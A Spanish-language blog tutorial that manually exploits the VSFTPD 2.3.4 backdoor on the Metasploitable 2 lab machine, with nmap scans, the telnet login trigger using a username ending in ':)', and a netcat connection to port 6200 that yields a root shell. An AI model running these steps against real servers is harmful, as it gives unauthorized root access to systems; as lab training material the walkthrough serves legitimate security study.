H1RD SECURITY

Metasploitable 2, Atacando manualmente el puerto 21 VSFTPD 2.3.4

En el articulo anterior atacamos esta vulnerabilidad con ayuda de Metasploit, pero esta vez lo haremos manualmente, ya que al ser un backdoor, fue una vulnerabilidad creada a posta por alguien con malas intenciones, en este post veremos como ejecutar un backdoor de la manera original sin necesidad de usar Metasploit.

Para descargarte Metasploitable 2

Recuerda que puedes ver el articulo de como usamos esta vulnerabilidad con metasploit aqui

Puertos abiertos antes de empezar

Antes de empezar es recomendable que veamos cuales son los puertos abiertos de nuestra maquina objetivo, ya vereis que despues de abrir el backdoor habra otro puerto más abierto.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Nmap scan report for 192.168.1.41
Host is up (0.00037s latency).
Not shown: 65501 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
4239/tcp filtered vrml-multi-use
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
6697/tcp open ircs-u
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open msgsrvr
27242/tcp filtered unknown
34652/tcp open unknown
35474/tcp filtered unknown
41271/tcp open unknown
41542/tcp open unknown
42726/tcp open unknown
54399/tcp filtered unknown
MAC Address: 00:0C:29:D3:5F:CD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 185.82 seconds

Usando el backdoor

Para usar el backdoor nos conectamos al ftp desde telnet, en donde pasaremos un USER que tiene que acabar con :) y un PASS cualquiera, luego tenemos que salir, para ello pulsamos CONTROL+5 y salimos de telnet.

1
2
3
4
5
6
7
telnet 192.168.1.41 21
USER hola:)
PASS nolose

(pulsamos control +5)

quit.

Y si ahora ejecutaramos otra vez el nmap veriamos que tenemos un nuevo puerto abierto en el 6200.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Nmap scan report for 192.168.1.41
Host is up (0.00036s latency).
Not shown: 65504 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6200/tcp open lm-x
6667/tcp open irc
6697/tcp open ircs-u
8009/tcp open ajp13
8180/tcp open unknown
8787/tcp open msgsrvr
34652/tcp open unknown
41271/tcp open unknown
41542/tcp open unknown
42726/tcp open unknown
MAC Address: 00:0C:29:D3:5F:CD (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.54 seconds

Ahora seria tan facil como abrir un netcat o un telnet al puerto 6200… y ala.. ya somos root!

1
nc 192.168.1.41 6200
Acceso root a la maquina objetivo después de usar el backdoor
Acceso root a la maquina objetivo después de usar el backdoor
  • Injection (7)
  • Hacker (39)
  • Owasp (17)
  • Intro (10)
  • Hijacking (5)
  • Protocolos (6)
  • Http (5)
  • Telnet (1)
  • Xss (5)
  • Fiddler (2)
  • Programacion (2)
  • Lua (2)
  • Pentesting (16)
  • Nmap (9)
  • Firewall (1)
  • Ids (1)
  • Recon-ng (3)
  • Protocolos (3)
  • Articulos (1)
  • Metasploit (5)
  • Metasploitable2 (5)
  • Hydra (1)